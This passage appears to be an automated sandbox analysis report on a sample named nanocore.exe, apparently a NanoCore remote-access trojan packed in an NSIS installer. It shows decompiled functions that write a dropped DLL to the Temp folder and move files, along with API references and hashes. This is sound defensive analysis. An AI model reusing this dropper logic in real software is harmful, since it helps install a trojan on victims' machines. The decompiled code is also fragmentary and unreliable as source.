            0x00405b0e
            0x00405b0e
            0x00405b15
            0x00405b19
            0x00405b19
            0x00405b1a
            0x00405b1d
            0x00405b29
            0x00405b2f
            0x00405b31
            0x00405b50
            0x00405b50
            0x00000000
            0x00405b50
            0x00405b37
            0x00405b40
            0x00405b43
            0x00405b48
            0x00405b4c
            0x00000000
            0x00000000
            0x00405b53
            0x00405b53
            0x00405b53
            0x00405b57
            0x00405b5a
            0x00405b5c
            0x00405b60
            0x00405b66
            0x00405b66
            0x00405b60
            0x00000000
            0x00405b5a
            0x00405a8b
            0x00405be2
            0x00405bec
            0x00405bf8
            0x00405bf8
            0x00000000

            APIs
            • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
            • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
            • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
            • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
            • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
            • API String ID: 4227507514-3711765563
            • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
            • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
            Download Yara Rule
            C-Code - Quality: 32%
            			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














            0x004026fb
            0x00402707
            0x0040270a
            0x00402711
            0x00402712
            0x00402737
            0x0040273c
            0x00402714
            0x00402719
            0x0040271a
            0x0040271a
            0x00402742
            0x0040274f
            0x00402757
            0x0040275a
            0x00402760
            0x0040276e
            0x00402773
            0x00402777
            0x0040277a
            0x00402783
            0x0040278f
            0x00402793
            0x00402796
            0x00402798
            0x0040279b
            0x0040279c
            0x0040279d
            0x004027a0
            0x004027bf
            0x004027ac
            0x004027b4
            0x004027b7
            0x004027bc
            0x004027bc
            0x004027c6
            0x004027c6
            0x004027d8
            0x004027df
            0x004027e5
            0x004027e6
            0x004027e7
            0x004027ea
            0x004027f1
            0x004027f1
            0x004027f7
            0x004027fd
            0x004027fd
            0x00402807
            0x00402808
            0x0040280c
            0x0040280e
            0x00402814
            0x00402814
            0x0040281b
            0x004021e8
            0x00402932
            0x0040293e

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
            • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
            • GlobalFree.KERNEL32 ref: 004027C6
            • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
            • GlobalFree.KERNEL32 ref: 004027DF
            • CloseHandle.KERNEL32(?), ref: 004027F7
            • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 3508600917-1015288780
            • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
            • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















            0x00404d68
            0x00404d74
            0x00404d77
            0x00404d7d
            0x00404d89
            0x00404d8c
            0x00404d8f
            0x00404d95
            0x00404d95
            0x00404d9b
            0x00404da3
            0x00404da6
            0x00404dc3
            0x00404dc7
            0x00404dd0
            0x00404dd0
            0x00404dda
            0x00404de3
            0x00404def
            0x00404df6
            0x00404dfa
            0x00404dfd
            0x00404e10
            0x00404e1e
            0x00404e1e
            0x00404e22
            0x00404e24
            0x00404e27
            0x00000000
            0x00404e27
            0x00404da8
            0x00404db0
            0x00404db8
            0x00404dbe
            0x00000000
            0x00404dbe
            0x00404db8
            0x00404da6
            0x00404e31

            APIs
            • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
            • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
            • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
            • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID: `y
            • API String ID: 2531174081-1740403070
            • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
            • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








            0x00405bfd
            0x00405c05
            0x00405c19
            0x00405c19
            0x00405c1f
            0x00405c2c
            0x00405c2c
            0x00405c2d
            0x00405c2f
            0x00405c33
            0x00405c35
            0x00405c3e
            0x00405c40
            0x00405c5a
            0x00405c62
            0x00405c62
            0x00405c67
            0x00405c69
            0x00405c6b
            0x00405c6f
            0x00405c70
            0x00405c73
            0x00405c7b
            0x00405c7d
            0x00405c81
            0x00000000
            0x00000000
            0x00405c87
            0x00405c8c
            0x00000000
            0x00000000
            0x00000000
            0x00405c8c
            0x00405c91

            APIs
            • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
            • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
            • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            Strings
            • *?|<>/":, xrefs: 00405C43
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Char$Next$Prev
            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
            • API String ID: 589700163-562438032
            • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
            • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








            0x00403e20
            0x00403eb4
            0x00000000
            0x00403eb4
            0x00403e31
            0x00403e35
            0x00000000
            0x00000000
            0x00403e3b
            0x00403e44
            0x00403e47
            0x00403e47
            0x00403e4d
            0x00403e53
            0x00403e53
            0x00403e5f
            0x00403e65
            0x00403e6c
            0x00403e6f
            0x00403e72
            0x00403e74
            0x00403e74
            0x00403e7c
            0x00403e82
            0x00403e82
            0x00403e8c
            0x00403e91
            0x00403e94
            0x00403e99
            0x00403e9c
            0x00403e9c
            0x00403eac
            0x00403eac
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
            • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






            0x00401674
            0x00401684
            0x00401688
            0x00401690
            0x004016a7
            0x004016af
            0x004016b8
            0x004016b8
            0x004016cb
            0x004016d7
            0x004026da
            0x004016ed
            0x004016f3
            0x004016f8
            0x00000000
            0x004016f8
            0x004016cd
            0x004016cd
            0x004021e8
            0x004021e8
            0x004021e8
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 00401690
            • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 0040169A
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016AF
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016B8
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ), ref: 00405CA2
              • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
              • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
              • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
              • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
              • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
              • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
              • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
              • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
              • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
              • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • MoveFileA.KERNEL32(?,?), ref: 004016C3
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
            • String ID: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 2621199633-4214189533
            • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
            • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














            0x00404635
            0x00404642
            0x00404648
            0x00404686
            0x00404686
            0x00404695
            0x0040469c
            0x00000000
            0x0040469e
            0x0040464a
            0x00404659
            0x00404661
            0x00404664
            0x00404676
            0x0040467c
            0x00404683
            0x00000000
            0x00404683
            0x00000000

            APIs
            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
            • GetMessagePos.USER32 ref: 0040464A
            • ScreenToClient.USER32 ref: 00404664
            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
            Strings
